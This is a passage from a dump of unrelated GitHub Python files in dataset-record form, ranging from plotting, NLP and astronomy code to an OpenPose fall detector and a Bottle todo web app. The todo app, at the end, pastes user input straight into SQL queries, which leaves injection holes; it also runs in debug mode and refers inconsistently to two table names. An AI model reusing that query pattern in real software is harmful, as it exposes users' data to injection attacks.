row: {}, column: {}, value: {}\".format(row, column, msg))\n                sheet.cell(row=row, column=column, value=msg)\n            except Exception as e:\n                logger.error(\"Excel write_data failed: {}\".format(e))\n\n        wb = openpyxl.load_workbook(self.file_path)\n        sheet = wb[sheet]\n        for i in args:\n            write(sheet, **i)\n        wb.save(self.file_path)\n        wb.close()\n\n\nif __name__ == '__main__':\n    # obj = ReadExcel(Constant.EXCEL_DIR + \"/cases.xlsx\", \"smoke2\", \"smoke3\", \"smoke4\", \"smoke5\", \"smoke6\", \"smoke7\",\n    #                 \"smoke8\", \"smoke9\", \"smoke10\", \"smoke11\", \"smoke12\", \"smoke13\", \"smoke14\", \"smoke15\",\n    #                 \"smoke16\", \"smoke17\")\n    excel = ReadExcel(Constant.EXCEL_DIR + \"/cases.xlsx\", \"init1\")\n    obj = excel.read_obj()\n    dic = excel.read_dict()\n    print(obj)\n    print(list(dic))\n","repo_name":"fungaegis/api-automatic-framework","sub_path":"common/read_excel.py","file_name":"read_excel.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"21897943130","text":"import pandas as pd\n\n#df = pd.read_csv('https://raw.githubusercontent.com/plotly/datasets/master/finance-charts-apple.csv')\ndf = pd.read_csv('chart1.csv')\n#df['DateTime'] = df['Date'] + \" \" + df['Time']\nprint(df)\n# parse the whole Date/Time columns at once; datetime.strptime() only accepts single strings\ndf['DateTime'] = pd.to_datetime(df['Date'] + \" \" + df['Time'], format=\"%m/%d/%Y %H:%M\")\n\nimport plotly.graph_objects as go\nfig = go.Figure(data=[go.Candlestick(x=df['DateTime'],\n                open=df['Open'],\n                high=df['High'],\n                low=df['Low'],\n                close=df['Close'])])\n\nfig.show()\n","repo_name":"karlfe/trading","sub_path":"chart/csv2chart.py","file_name":"csv2chart.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38735594632","text":"from fairseq.data import SampledMultiEpochDataset\nimport cytoolz as toolz\nimport more_itertools\n\n\nclass BatchedSampledMultiEpochDataset(SampledMultiEpochDataset):\n    \"\"\"\n    The only difference compared with SampledMultiEpochDataset is\n    batch size. 
This dataset will only group data from one dataset\n to one batch.\n \"\"\"\n\n def _group_indices_by_dataset_index(self, indices):\n return toolz.groupby(lambda x: self._get_dataset_and_index(x)[0], indices)\n\n def batch_by_size(self, indices, max_tokens=None, max_sentences=None, required_batch_size_multiple=1):\n batches = []\n for _, grouped_indices in self._group_indices_by_dataset_index(indices).items():\n # Group indices by the dataset.\n batches.append(\n super().batch_by_size(grouped_indices, max_tokens, max_sentences, required_batch_size_multiple)\n )\n return list(more_itertools.flatten(batches))\n\n def collater(self, samples, **extra_args):\n if len(samples) == 0:\n return None\n # Add language to the batch\n batch = super().collater(samples, **extra_args)\n assert len(set(sample[0] for sample in samples)) == 1\n key = self.keys[samples[0][0]]\n # The format of key {data_category}:{src}-{tgt}\n src_lang, tgt_lang = key.split(\":\")[1].strip().split(\"-\")\n batch[\"src_lang\"] = src_lang\n batch[\"tgt_lang\"] = tgt_lang\n return batch\n","repo_name":"NLP-Playground/LaSS","sub_path":"fairseq_code/datasets/batched_sampled_multi_epoch_dataset.py","file_name":"batched_sampled_multi_epoch_dataset.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"780555497","text":"__all__ = (\"find_telescopes\", \"NFollowStacker\")\n\n\nimport numpy as np\n\nfrom .base_stacker import BaseStacker\nfrom .coord_stackers import ra_dec2_alt_az\n\n\ndef find_telescopes(min_size=3.0):\n \"\"\"Finds telescopes larger than min_size, from list of large telescopes based on\n http://astro.nineplanets.org/bigeyes.html.\n\n Returns\n -------\n np.recarray\n Array of large telescopes with columns [aperture, name, lat, lon].\n \"\"\"\n # Aperture Name Location http://astro.nineplanets.org/bigeyes.html\n telescopes = [\n [10.4, \"Gran Canarias\", \"La Palma\"],\n [10.0, \"Keck\", \"Mauna Kea\"],\n [10.0, \"Keck II\", \"Mauna Kea\"],\n [9.2, \"SALT\", \"South African Astronomical Observatory\"],\n [9.2, \"Hobby-Eberly\", \"Mt. Fowlkes\"],\n [8.4, \"Large Binocular Telescope\", \"Mt. Graham\"],\n [8.3, \"Subaru\", \"Mauna Kea\"],\n [8.2, \"Antu\", \"Cerro Paranal\"],\n [8.2, \"Kueyen\", \"Cerro Paranal\"],\n [8.2, \"Melipal\", \"Cerro Paranal\"],\n [8.2, \"Yepun\", \"Cerro Paranal\"],\n [8.1, \"Gemini North\", \"Mauna Kea\"],\n [8.1, \"Gemini South\", \"Cerro Pachon\"],\n [6.5, \"MMT\", \"Mt. 
Hopkins\"],\n [6.5, \"Walter Baade\", \"La Serena\"],\n [6.5, \"Landon Clay\", \"La Serena\"],\n [6.0, \"Bolshoi Teleskop Azimutalnyi\", \"Nizhny Arkhyz\"],\n [6.0, \"LZT\", \"British Columbia\"],\n [5.0, \"Hale\", \"Palomar Mountain\"],\n [4.3, \"Dicovery Channel\", \"Lowell Observatory\"],\n [4.2, \"William Herschel\", \"La Palma\"],\n [4.2, \"SOAR\", \"Cerro Pachon\"],\n [4.2, \"LAMOST\", \"Xinglong Station\"],\n [4.0, \"Victor Blanco\", \"Cerro Tololo\"],\n [4.0, \"Vista\", \"Cerro Paranal\"],\n [3.9, \"Anglo-Australian\", \"Coonabarabran\"],\n [3.8, \"Mayall\", \"Kitt Peak\"],\n [3.8, \"UKIRT\", \"Mauna Kea\"],\n [3.6, \"360\", \"Cerro La Silla\"],\n [3.6, \"Canada-France-Hawaii\", \"Mauna Kea\"],\n [3.6, \"Telescopio Nazionale Galileo\", \"La Palma\"],\n [3.5, \"MPI-CAHA\", \"Calar Alto\"],\n [3.5, \"New Technology\", \"Cerro La Silla\"],\n [3.5, \"ARC\", \"Apache Point\"],\n [3.5, \"WIYN\", \"Kitt Peak\"],\n [3.0, \"Shane\", \"Mount Hamilton\"],\n [3.0, \"NASA IRTF\", \"Mauna Kea\"],\n ]\n\n scopes = np.zeros(\n len(telescopes),\n dtype=list(zip([\"aperture\", \"name\", \"lat\", \"lon\"], [float, (np.str_, 38), float, float])),\n )\n\n # name, lat (S negative), lon (W negative)\n observatories = [\n [\"Cerro Paranal\", -24, 38, -70, 24],\n [\"Nizhny Arkhyz\", 43, 39, 41, 26],\n [\"Cerro La Silla\", -29, 15, -70, 44],\n [\"Lowell Observatory\", 35, 12, -111, 40],\n [\"Apache Point\", 32, 47, -105, 49],\n [\"Mount Hamilton\", 37, 21, -121, 38],\n [\"South African Astronomical Observatory\", -32, 23, 20, 49],\n [\"Cerro Pachon\", -30, 20, -70, 59],\n [\"Coonabarabran\", -31, 17, 149, 0o4],\n [\"Mt. Fowlkes\", 30, 40, -104, 1],\n [\"La Palma\", 28, 46, -17, 53],\n [\"Mt. Graham\", 32, 42, -109, 53],\n [\"Calar Alto\", 37, 13, -2, 33],\n [\"British Columbia\", 49, 17, -122, 34],\n [\"Kitt Peak\", 31, 57, -111, 37],\n [\"La Serena\", -30, 10, -70, 48],\n [\"Palomar Mountain\", 33, 21, -116, 52],\n [\"Xinglong Station\", 40, 23, 105, 50],\n [\"Mt. Hopkins\", 31, 41, -110, 53],\n [\"Cerro Tololo\", -30, 10, -70, 49],\n [\"Mauna Kea\", 19, 50, -155, 28],\n ]\n\n # Make a nice little dict to look up the observatory positions\n obs = {}\n for i, ob in enumerate(observatories):\n obs[ob[0]] = [\n (np.abs(ob[1]) + ob[2] / 60.0) * (ob[1] / np.abs(ob[1])),\n (np.abs(ob[3]) + ob[4] / 60.0) * (ob[3] / np.abs(ob[3])),\n ]\n\n for i, telescope in enumerate(telescopes):\n scopes[\"aperture\"][i] = telescope[0]\n scopes[\"name\"][i] = telescope[1]\n scopes[\"lat\"][i], scopes[\"lon\"][i] = obs[telescope[2]]\n\n scopes = scopes[np.where(scopes[\"aperture\"] >= min_size)]\n return scopes\n\n\nclass NFollowStacker(BaseStacker):\n \"\"\"Add the number of telescopes ('nObservatories') that could follow up any visit\n at (any of the) times in timeStep, specifying the minimum telescope size (in meters) and airmass limit.\n\n Parameters\n ----------\n minSize: float, optional\n The minimum telescope aperture to use, in meters. Default 3.0.\n airmass_limit: float, optional\n The maximum airmass allowable at the follow-up observatory. Default 2.5.\n time_steps: np.array or list of floats, optional\n The timesteps to check for followup opportunities, in hours. Default is np.arange(0.5, 12., 3.0).\n mjd_col: str, optional\n The exposure MJD column name. Default 'observationStartMJD'.\n ra_col: str, optional\n The RA column name. Default 'fieldRA'.\n dec_col: str, optional\n The Dec column name. 
Default 'fieldDec'.\n raDecDeg: bool, optional\n Flag whether RA/Dec are in degrees (True) or radians (False).\n \"\"\"\n\n cols_added = [\"nObservatories\"]\n\n def __init__(\n self,\n min_size=3.0,\n airmass_limit=2.5,\n time_steps=np.arange(0.5, 12.0, 3.0),\n mjd_col=\"observationStartMJD\",\n ra_col=\"fieldRA\",\n dec_col=\"fieldDec\",\n degrees=True,\n ):\n self.mjd_col = mjd_col\n self.ra_col = ra_col\n self.dec_col = dec_col\n self.degrees = degrees\n self.cols_added_dtypes = [int]\n self.cols_req = [self.mjd_col, self.ra_col, self.dec_col]\n self.units = [\"#\"]\n self.airmass_limit = airmass_limit\n self.time_steps = time_steps\n self.telescopes = find_telescopes(min_size=min_size)\n\n def _run(self, sim_data, cols_present=False):\n if cols_present:\n return sim_data\n sim_data[\"nObservatories\"] = 0\n if self.degrees:\n ra = np.radians(sim_data[self.ra_col])\n dec = np.radians(sim_data[self.dec_col])\n else:\n ra = sim_data[self.ra_col]\n dec = sim_data[self.dec_col]\n for obs in self.telescopes:\n obs_got_it = np.zeros(len(sim_data[self.ra_col]), int)\n obs_lon = np.radians(obs[\"lon\"])\n obs_lat = np.radians(obs[\"lat\"])\n for step in self.time_steps:\n alt, az = ra_dec2_alt_az(\n ra,\n dec,\n obs_lon,\n obs_lat,\n sim_data[self.mjd_col] + step / 24.0,\n altonly=True,\n )\n airmass = 1.0 / (np.cos(np.pi / 2.0 - alt))\n followed = np.where((airmass <= self.airmass_limit) & (airmass >= 1.0))\n # If the observatory got an observation, save this into obs_got_it.\n # obs_got_it will be 1 if ANY of the times got an observation.\n obs_got_it[followed] = 1\n # If an observatory got an observation, count it in nObservatories.\n sim_data[\"nObservatories\"] += obs_got_it\n return sim_data\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/stackers/n_follow_stacker.py","file_name":"n_follow_stacker.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"6800011471","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 5 18:50:30 2021\n\n@author: wmorland\n\"\"\"\n\nimport sys\nimport logging\nimport nmea\n\n\nnmea.zip_logs()\nnmea.send_to_drive()\n\ncan0 = nmea.start_can_bus()\nif can0 is None:\n logging.error('Oops.')\n sys.exit(-1)\n\ngps_time = nmea.get_gps_time(can0)\nlog_file = gps_time.strftime('%Y%m%d-%H:%M:%S-Log.n2k')\n\nnmea.set_filters(can0)\n\n# start logging in an infinite loop until there is an interupt\n\n# on interupt\n\nnmea.stop_can_bus()\nnmea.zip_logs()\nnmea.send_to_drive()\n\n# check that the log file was successfully send to Google drive then delete it\n\nsys.exit(0)\n","repo_name":"Bill374/2000-sail-polars","sub_path":"Logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19912610312","text":"l_t = ['в', '5', 'часов', '17', 'минут', 'температура', 'воздуха', 'была', '+5', 'градусов']\n\ni = 0\n\nwhile i < len(l_t):\n if l_t[i].isnumeric():\n l_t[i] = '\"' + l_t[i].zfill(2) + '\"'\n elif l_t[i].startswith('+'):\n l_t[i] = '\"' + l_t[i].zfill(3) + '\"'\n i += 1\nl_t = ''.join(l_t)\n\nprint(l_t)\n","repo_name":"Amor2302/lesson_3","sub_path":"lesson_2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41666282447","text":"import argparse\nimport logging\nimport 
\nimport time\nimport math\nimport cv2\nimport numpy as np\nimport pyopenpose as op\nimport pickle\n\ndef posture_square(poseKeypoints,accuracy_threshold):\n    length=np.size(poseKeypoints,0)\n    width=np.size(poseKeypoints,1)\n    x_max=-10000\n    x_min=10000\n    y_max=-10000\n    y_min=10000\n    detected_corrected_rate=0\n    not_zero_components=length\n    for i in range(length):\n        if poseKeypoints[i,2]==0:\n            not_zero_components=not_zero_components-1\n            continue\n        detected_corrected_rate=detected_corrected_rate+poseKeypoints[i,2]\n        if poseKeypoints[i,width-1]>=accuracy_threshold: # Only count points above the confidence threshold\n            if poseKeypoints[i,0]>=x_max:\n                x_max=poseKeypoints[i,0]\n            if poseKeypoints[i,0]<=x_min:\n                x_min=poseKeypoints[i,0]\n            if poseKeypoints[i,1]>=y_max:\n                y_max=poseKeypoints[i,1]\n            if poseKeypoints[i,1]<=y_min:\n                y_min=poseKeypoints[i,1]\n    x_range=x_max-x_min\n    y_range=y_max-y_min\n    average_detected_corrected_rate=detected_corrected_rate/not_zero_components\n    return (x_range,y_range,average_detected_corrected_rate)\n\n\ndef fifo_append(user_array,value):\n    length=np.size(user_array,1)\n    full_or_not=False # Whether the FIFO buffer is full or not\n    insert_head_velocity=0.0\n    average_head_velocity=0.0\n    if value[0,2]<0.3: # if the head keypoint is not detected or shifts strangely, do not modify user_array; just return the last results (Nov_24)\n        if user_array[0,0]!=0 and user_array[0,1]!=0:\n            full_or_not=True\n            insert_head_velocity=(user_array[1,length-1]-user_array[1,length-2]) # ATTEMPT 1: Only calculate y-axis velocity\n            average_head_velocity=(user_array[1,length-1]-user_array[1,0])/7\n        return [user_array, full_or_not, insert_head_velocity, average_head_velocity] # Do not insert an unreliable point into the array\n    for i in range(length-1):\n        user_array[0,i]=user_array[0,i+1]\n        user_array[1,i]=user_array[1,i+1]\n    user_array[0,length-1]=value[0,0]\n    user_array[1,length-1]=value[0,1]\n    if user_array[0,0]!=0 and user_array[0,1]!=0: # At this stage the FIFO buffer is full\n        insert_head_velocity=(user_array[1,length-1]-user_array[1,length-2]) # ATTEMPT 1: Only calculate y-axis velocity\n        average_head_velocity=(user_array[1,length-1]-user_array[1,0])/7\n        full_or_not=True\n        # print(head_monitor)\n        # print(full_or_not)\n        # print(insert_head_velocity)\n        # print(average_head_velocity)\n\n    return [user_array, full_or_not, insert_head_velocity, average_head_velocity]\n\ndef body_tilt_detection(human_keypoints):\n    \n    center_line_angle=math.pi/2 # default: 90 degrees (vertical)\n    points_are_accurate=True\n\n    head_position=np.zeros([1,3],dtype=float)\n    hip_center_position=np.zeros([1,3],dtype=float)\n    for i in range(np.size(head_position,1)):\n        head_position[0,i]=human_keypoints[0,i] # Position and accuracy of head point\n        hip_center_position[0,i]=human_keypoints[8,i] # Position and accuracy of hip center point\n    if head_position[0,2]<0.2 or hip_center_position[0,2]<0.2:\n        # We deem that these two points are not reliable\n        points_are_accurate=False\n        center_line_angle=math.pi/2\n        return [center_line_angle,points_are_accurate] \n    y_distance=abs(head_position[0,1]-hip_center_position[0,1]) # y_distance\n    x_distance=abs(head_position[0,0]-hip_center_position[0,0]) # x_distance\n    if x_distance<10:\n        x_distance=10\n    center_line_angle=math.atan(y_distance/x_distance)\n    return [center_line_angle, points_are_accurate]\n\nlogger = logging.getLogger('TfPoseEstimatorRun')\nlogger.handlers.clear()\nlogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nformatter = logging.Formatter('[%(asctime)s] [%(name)s] [%(levelname)s] %(message)s')\n
ch.setFormatter(formatter)\nlogger.addHandler(ch)\n\n\nif __name__ == '__main__':\n    fps_time = 0\n    # Create a FIFO buffer to store the head position history\n    head_keypoint=np.zeros([1,3],dtype=float)\n    head_history=np.zeros([2,7],dtype=float) # Two rows, since the position of a point is represented by x and y\n\n    params = dict()\n    params[\"model_folder\"] = \"../../models/\"\n    params[\"net_resolution\"] = \"960x720\" \n\n    # Starting OpenPose\n    opWrapper = op.WrapperPython()\n    opWrapper.configure(params)\n    opWrapper.start()\n\n\n    print(\"OpenPose start\")\n    cap = cv2.VideoCapture('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/output_new4.avi')\n    cap.set(cv2.CAP_PROP_FRAME_WIDTH, 960)\n    cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)\n\n    #fourcc = cv2.VideoWriter_fourcc('m', 'p', '4', 'v') # Set the format of the output video\n    #fourcc = cv2.VideoWriter_fourcc('M', 'J', 'P', 'G') # Set the format of the output video\n    #out_video = cv2.VideoWriter('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/analyze.avi', fourcc, cap.get(cv2.CAP_PROP_FPS), (960,720))\n    frame_width = int( cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n    frame_height =int( cap.get( cv2.CAP_PROP_FRAME_HEIGHT))\n    print(frame_height)\n    print(frame_width)\n    #out_video = cv2.VideoWriter('/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), cap.get(cv2.CAP_PROP_FPS), (frame_height,frame_width))\n    \n    # STORE RESULT VIDEO NOV_24\n    pathOut = '/home/ad/openpose_v2_with_api/examples/tutorial_api_python/video_collection/experiment_results/output_new4.avi'\n    fps = 2\n    size = (960,720)\n    out = cv2.VideoWriter(pathOut,cv2.VideoWriter_fourcc(*'DIVX'), fps, size) # If you do not want to save the test result, comment out all uses of the \"out\" object\n\n\n\n\n    # HEAD monitor\n    head_monitor=np.zeros([2,7],dtype=float)\n    # velocity threshold for fall detection\n    ave_velocity_threshold=20 #12\n    # BODY TILT settings\n    fall_angle_threshold=math.pi/6\n\n    # FALL HAPPENS!\n    fall_happen=False\n\n    # Record the falling period (picture xxxx - xxxx is falling)\n    picture_id=0\n    # Record the picture_id when fall happens\n    fall_happen_picture_id=np.array([],dtype=int)\n    append_copy=np.zeros([1,1],dtype=int)\n\n    while (cap.isOpened()):\n\n        #ret_val, dst_before_rotate = cap.read()\n        ret_val, dst = cap.read()\n        #dst=cv2.rotate(dst_before_rotate,cv2.ROTATE_180)\n        if ret_val == False:\n            print(\"Camera read Error\")\n            break\n        # Resize only after a successful read; resizing a failed (None) frame would crash\n        dst = cv2.resize(dst,(960,720),fx=0,fy=0, interpolation = cv2.INTER_CUBIC)\n        picture_id+=1\n        print('current picture is ', picture_id)\n        datum = op.Datum()\n        datum.cvInputData = dst # Input the captured frame into the OpenPose datum\n        opWrapper.emplaceAndPop([datum]) # Analyzing Datum\n        fps = 1.0 / (time.time() - fps_time) # After a successful analysis, calculate the FPS\n        fps_time = time.time()\n        newImage = datum.cvOutputData[:, :, :] # This is the analysis result from OpenPose\n        cv2.putText(newImage , \"FPS: %f\" % (fps), (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 0), 2) # Print the just-calculated FPS on the frame\n        if fall_happen==True:\n            cv2.putText(newImage,\"FALL HAPPENS\",(360, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2)\n        \n        if np.size(datum.poseKeypoints)!=1:\n            # Print out the total number of detected persons\n            human_count = 0\n            # remove noise postures in detection\n            accuracy_threshold=0.3 \n            x_range_threshold=100 \n            y_range_threshold=100 \n            average_accuracy_rate=0\n            human_id_in_keypoints=1e6\n\n\n\n            font = cv2.FONT_HERSHEY_SIMPLEX\n
            for i in range(np.size(datum.poseKeypoints,0)):\n                for j in range(25): # first target: print keypoints in picture\n                    cv2.putText(newImage,str(j), ( int(datum.poseKeypoints[i][j][0]) + 10, int(datum.poseKeypoints[i][j][1])), font, 0.5, (0,255,0), 2) \n                #print(datum.poseKeypoints[i])\n                # second target: remove noise postures when detecting humans\n                x_range,y_range, average_accuracy_rate=posture_square(datum.poseKeypoints[i],accuracy_threshold)\n                \n                if x_range<=x_range_threshold and y_range<=y_range_threshold: # the detection is too small to be a human\n                    continue\n                if average_accuracy_rate>=0.3:\n                    human_id_in_keypoints=i\n                    human_count+=1\n            cv2.putText(newImage,\"Person number: %i\" % (human_count),(20, 680), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n\n            if human_id_in_keypoints!= 1e6: # If human_id_in_keypoints is no longer 1e6, there is a human in the picture\n                human_keypoints=datum.poseKeypoints[human_id_in_keypoints]\n                #print(human_keypoints)\n\n                # HEAD monitor\n                [head_monitor, full_or_not, insert_head_velocity, average_head_velocity]=fifo_append(head_monitor,human_keypoints)\n                print(human_keypoints)\n                # print(head_monitor)\n                # print(full_or_not)\n                # print(insert_head_velocity)\n                # print(average_head_velocity)\n                if full_or_not == True: # The HEAD monitor array is full now, so its results are reliable\n                    #print(insert_head_velocity)\n                    #print(average_head_velocity)\n                    cv2.putText(newImage,\"insert v: %f\" % (insert_head_velocity),(600, 40), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n                    cv2.putText(newImage,\"average v: %f\" % (average_head_velocity),(600, 680), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n\n                    # If the average head velocity is beyond the threshold, the fall detection algorithm should start working\n                    if average_head_velocity>=ave_velocity_threshold:\n                        # BODY TILT detection\n                        center_line_angle, points_are_accurate=body_tilt_detection(human_keypoints)\n\n                        if points_are_accurate==True:\n                            cv2.putText(newImage,\"tilt_angle: %f\" % (center_line_angle),(600, 360), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,0),2)\n                            if center_line_angle<=math.pi/5: \n                                fall_happen=True\n                                append_copy[0]=picture_id\n                                fall_happen_picture_id=np.append(fall_happen_picture_id,append_copy)\n                                a_file=open(\"fall_id.txt\",\"w\")\n                                np.savetxt(a_file,fall_happen_picture_id)\n                                #pickle.dump(fall_happen_picture_id,a_file)\n                                a_file.close()\n\n\n\n\n\n\n\n        #out_video.write(newImage)\n        cv2.imshow(\"test\",newImage)\n        out.write(newImage)\n        cv2.waitKey(1)\n        #out_video.write(newImage)\n\n\n    print('Fall happen picture id: ',fall_happen_picture_id)\n    cv2.destroyAllWindows()\n    #out_video.release()\n    cap.release()\n    out.release()","repo_name":"zh237/IERG-6200-project-CV-based-fall-detector","sub_path":"video_analyze.py","file_name":"video_analyze.py","file_ext":"py","file_size_in_byte":11198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"19640088942","text":"import json\r\nimport requests\r\n\r\nurl_usable = \"https://api.coinmarketcap.com/v1/ticker/?start=0&limit=100\"\r\nresponse = requests.get(url_usable)\r\ntext = response.text\r\ndata = json.loads(text)\r\n\r\nprint(\"coins_tracked = [\")\r\nfor coin in data:\r\n    print(\"    '\" + coin['symbol'] + \"',\")\r\nprint(\"]\")\r\n\r\n","repo_name":"mkm1997/CryptoGrade-Complete","sub_path":"CoinViewer/utilfunctions/gen_coins_tracked.py","file_name":"gen_coins_tracked.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"34565787967","text":"from typing import List\n# In this problem I used a dictionary to count all the elements frequency\n# then simply sorted in reverse order using the sort function and then displayed the returned the total number of top k frequent elements\ndef topK(nums:List[int], k:int) -> List[int]:\n rl = []\n e = list(set(nums))\n c = [0]*len(e)\n d = dict(zip(e,c))\n for i in nums:\n d[i] += 1\n d = dict(sorted(d.items(), key=lambda item: item[1], reverse=True))\n keys = list(d.keys())\n for i in range(k):\n rl.append(keys[i])\n return rl\n\nif __name__ == '__main__':\n nums = [1,1,1,2,2,3]\n k = 2\n print(topK(nums,k))\n","repo_name":"HarshaanNiles010/leetcode_soltuions","sub_path":"top_k_frequent.py","file_name":"top_k_frequent.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74675323306","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [url(r'^admin/service/$', views.my_admin_view),\n url(r'^$', views.events_list, name='events_list'),\n url(r'^adm/$', views.admin_list, name='adm'),\n url(r'^adm/jserv/$', views.jservice, name='jservice'),\n url(r'^jdata/$', views.jdata, name='jdata'),\n url(r'^tag/$', views.set_tags, name='tag_it'),\n url(r'^set_user_location/$', views.set_user_location, name='set_user_location'),\n url(r'^(?P[a-z]+)/$', views.events_list, name='location_events'),\n url(r'^add_event_selector/$', views.add_event_selector, name='add_event_selector'),\n url(r'^add_event_form/$', views.add_event_form, name='add_event_form'),\n url(r'^add_successfully/$', views.add_successfully, name='add_successfully'),\n url(r'^add_failed/$', views.add_failed, name='add_failed'),\n url(r'^(?P[a-z]+)/(?P[0-9]+)/(?P[\\w\\-.%]*)$', views.events_details,\n name='event_details'),\n ]\n","repo_name":"ASVorobiev/django_project","sub_path":"django_project/mysite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22736857351","text":"#!Python\n# -*- coding: utf-8 -*-\nimport sys\nimport json, sqlite3\n#from bottle import route, run, debug, template, request, send_file, error\nfrom bottle import * \n\n# only needed when you run Bottle on mod_wsgi\nfrom bottle import default_app\n\nclass dbman:\n\tconn = 0\n\tcur = 0\n\tdef __init__(self):\n\t\tself.conn = sqlite3.connect('todo.db')\n\t\tself.cur = self.conn.cursor()\n\n\tdef execute(self, m_sql):\n\t\tself.cur.execute(m_sql)\n\t\tself.conn.commit()\n\n\tdef fatchall(self, m_sql):\n\t\tself.cur.execute(m_sql)\n\t\tret = self.cur.fetchall()\n\t\treturn ret\n\n\tdef __del__(self):\n\t\tself.conn.close()\n\ndbop = dbman();\ndef to_index():\n\ttodo = dbop.fatchall(\"select id, task, time from xtodo where status = 1\")\n\tdone = dbop.fatchall(\"select id, task, time from xtodo where status = 0\")\n\tret = template('index', todolist = todo, donelist = done)\n\treturn ret\n\ndef get_all_task():\n\tret = []\n\ttodo = dbop.fatchall(\"select id, task, status, time from xtodo where status = 1\")\n\tdone = dbop.fatchall(\"select id, task, status, time from xtodo where status = 0\")\n\tret.append(todo)\n\tret.append(done)\n\treturn json.dumps(ret)\n\n@route('/')\ndef index():\n\treturn to_index()\n@route('/get_all_task')\ndef all_task():\n\treturn get_all_task()\n\n@route('/add', method = 'POST')\ndef add_new():\n\tif 
request.forms.get('txtadd').strip():\n\t\tnew = request.forms.get('txtadd').strip()\n\t\tdbop.execute(\"INSERT INTO xtodo (task,status) VALUES ('%s', %s)\"% (new, 1))\n\t\treturn get_all_task()\n\n@route('/done/:itemid', method = 'GET')\t\t\ndef done_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"update xtodo set status = 0 where id = %s\" % itemid)\n\treturn get_all_task()\n\n@route('/redo/:itemid', method = 'GET')\ndef redo_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"update xtodo set status = 1 where id = %s\" % itemid)\n\treturn get_all_task()\n\n@route('/del/:itemid', method = 'GET')\ndef delete_this(itemid):\n\tif itemid.strip():\n\t\tdbop.execute(\"delete from xtodo where id = %s\" % itemid)\n\treturn get_all_task()\n\n\n@route('/static/<filename:path>')\ndef server_static(filename):\n\t#print filename\n\treturn static_file(filename, root='static/')\n\n@route('/edit/:no', method='GET')\ndef edit_item(no):\n\n    if request.GET.get('save','').strip():\n        edit = request.GET.get('task','').strip()\n        status = request.GET.get('status','').strip()\n\n        if status == 'open':\n            status = 1\n        else:\n            status = 0\n\n        conn = sqlite3.connect('todo.db')\n        c = conn.cursor()\n        c.execute(\"UPDATE todo SET task = ?, status = ? WHERE id LIKE ?\", (edit,status,no))\n        conn.commit()\n        conn.close()\n\n        return '
<p>The item number %s was successfully updated</p>
' % no\n\n    else:\n        conn = sqlite3.connect('todo.db')\n        c = conn.cursor()\n        c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", (no,))\n        cur_data = c.fetchone()\n        conn.close()\n\n        return template('edit_task', old = cur_data, no = no)\n\n@route('/item:item#[1-9]+#')\ndef show_item(item):\n\n    conn = sqlite3.connect('todo.db')\n    c = conn.cursor()\n    c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", (item,))\n    result = c.fetchall()\n    conn.close()\n\n    if not result:\n        return 'This item number does not exist!'\n    else:\n        return 'Task: %s' % result[0]\n\n@route('/help')\ndef help():\n\tpass\t\n#send_file('help.html', root='.')\n\n@route('/json:json#[1-9]+#')\ndef show_json(json):\n\n    conn = sqlite3.connect('todo.db')\n    c = conn.cursor()\n    c.execute(\"SELECT task FROM todo WHERE id LIKE ?\", (json,))\n    result = c.fetchall()\n    conn.close()\n\n    if not result:\n        return {'task':'This item number does not exist!'}\n    else:\n        return {'Task': result[0]}\n\n\n@error(403)\ndef mistake403(code):\n    return 'There is a mistake in your url!'\n\n@error(404)\ndef mistake404(code):\n    return 'Sorry, this page does not exist!'\n\n\ndebug(True)\nrun(reloader=True)\n#remember to remove reloader=True and debug(True) when you move your application from development to a production environment\n\n","repo_name":"helight/xtodo","sub_path":"xtodo.py","file_name":"xtodo.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
